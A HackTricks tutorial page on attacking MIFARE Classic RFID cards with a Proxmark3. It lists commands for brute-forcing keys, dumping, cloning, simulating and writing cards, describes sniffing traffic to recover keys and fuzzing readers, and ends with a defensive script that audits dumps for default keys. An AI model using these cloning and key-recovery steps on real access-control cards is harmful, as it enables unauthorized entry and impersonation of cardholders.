# Proxmark 3

{% hint style="success" %}
Learn & practice AWS Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)

Support HackTricks

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

## Attacking RFID Systems with Proxmark3

The first thing you need to do is get a [**Proxmark3**](https://proxmark.com) and [**install the software and its dependencies**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux).

### Attacking MIFARE Classic 1KB

It has **16 sectors**, each sector has **4 blocks**, and each block contains **16B**. The UID is in sector 0, block 0 (and cannot be changed).\
To access each sector you need **2 keys** (**A** and **B**), which are stored in **block 3 of each sector** (the sector trailer). The sector trailer also stores the **access bits** that grant **read and write** permissions.\
Having 2 keys is useful, for example, to grant read permission to whoever knows the first key and write permission to whoever knows the second.

Several attacks can be performed:

```bash
proxmark3> hf mf # List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic # Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
```

The Proxmark3 can also perform other actions, such as **eavesdropping on the communication between a tag and a reader** to look for sensitive data. On this card you can sniff the communication and calculate the key that was used.
This works because the **cryptographic operations used are weak**: knowing the plaintext and the ciphertext, you can calculate the key (`mfkey64` tool).

### Raw Commands

IoT systems sometimes use **non-branded or non-commercial tags**. In this case, you can use the Proxmark3 to send custom **raw commands** to the tags.

```bash
proxmark3> hf search
UID : 80 55 4b 6c
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
```

With this information you can look up details about the card and about how to communicate with it. The Proxmark3 can send raw commands such as: `hf 14a raw -p -b 7 26`

### Scripts

The Proxmark3 software includes a preloaded list of **automation scripts** that you can use to perform simple tasks. To retrieve the full list, use the `script list` command. Next, use the `script run` command followed by the name of the script:

```
proxmark3> script run mfkeys
```

You can create a script to **fuzz tag readers**. Copy the data of a valid **card**, then write a **Lua script** that **randomizes** one or more **bytes** and checks on each iteration whether the **reader crashes**.
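The sector and trailer layout described in the MIFARE Classic 1KB section can be checked offline against a card dump. The Python below is an added example, not part of the original page or of the Proxmark3 project: it parses a raw 1024-byte dump, decodes each sector trailer, and flags default keys, open access conditions, and corrupt access bits. The default-key list, the 4-byte UID, the function names, and the sample dump are assumptions constructed for this illustration.

```python
SECTORS, BLOCKS_PER_SECTOR, BLOCK_SIZE = 16, 4, 16
# Assumption: a short list of widely published default keys; extend for your estate.
DEFAULT_KEYS = {"FFFFFFFFFFFF", "000000000000", "A0A1A2A3A4A5", "D3F7D3F7D3F7"}


def decode_access_bits(acc):
    """Return [(C1, C2, C3)] for blocks 0..3, or None if the inverted copies mismatch."""
    b6, b7, b8 = acc
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    # Every nibble is stored a second time inverted; a mismatch means a corrupt trailer.
    if (b6 & 0x0F, b6 >> 4, b7 & 0x0F) != (c1 ^ 0xF, c2 ^ 0xF, c3 ^ 0xF):
        return None
    return [((c1 >> i) & 1, (c2 >> i) & 1, (c3 >> i) & 1) for i in range(4)]


def audit_dump(dump):
    """Return (uid_hex, findings); findings is a list of (sector, message)."""
    if len(dump) != SECTORS * BLOCKS_PER_SECTOR * BLOCK_SIZE:
        raise ValueError("expected a 1024-byte MIFARE Classic 1K dump")
    findings = []
    for sector in range(SECTORS):
        off = (sector * BLOCKS_PER_SECTOR + 3) * BLOCK_SIZE  # block 3 = sector trailer
        trailer = dump[off:off + BLOCK_SIZE]
        # Trailer layout: key A (6 B) | access bits (3 B) | user byte | key B (6 B)
        for name, key in (("A", trailer[:6]), ("B", trailer[10:16])):
            if key.hex().upper() in DEFAULT_KEYS:
                findings.append((sector, f"key {name} is a default key"))
        bits = decode_access_bits(trailer[6:9])
        if bits is None:
            findings.append((sector, "access bits fail the inverted-copy check"))
        elif all(b == (0, 0, 0) for b in bits[:3]):
            findings.append((sector, "data blocks use open condition 000"))
    return dump[:4].hex().upper(), findings  # assumes a 4-byte UID


def build_sample_dump():
    """Constructed sample data, not read from a real card."""
    def sector(trailer_hex, first_block=bytes(16)):
        return first_block + bytes(32) + bytes.fromhex(trailer_hex)
    weak = sector("FFFFFFFFFFFF" "FF0780" "69" "FFFFFFFFFFFF",
                  bytes.fromhex("80554B6C") + bytes(12))
    hard = sector("1A2B3C4D5E6F" "787788" "00" "A1B2C3D4E5F6")
    bad = sector("1A2B3C4D5E6F" "000000" "00" "A1B2C3D4E5F6")
    return weak + hard * 14 + bad


if __name__ == "__main__":
    print(audit_dump(build_sample_dump()))
```

Access condition `000` on a data block gives no read/write separation between the keys, so a sector flagged for it does not get the two-key split described in the MIFARE Classic section.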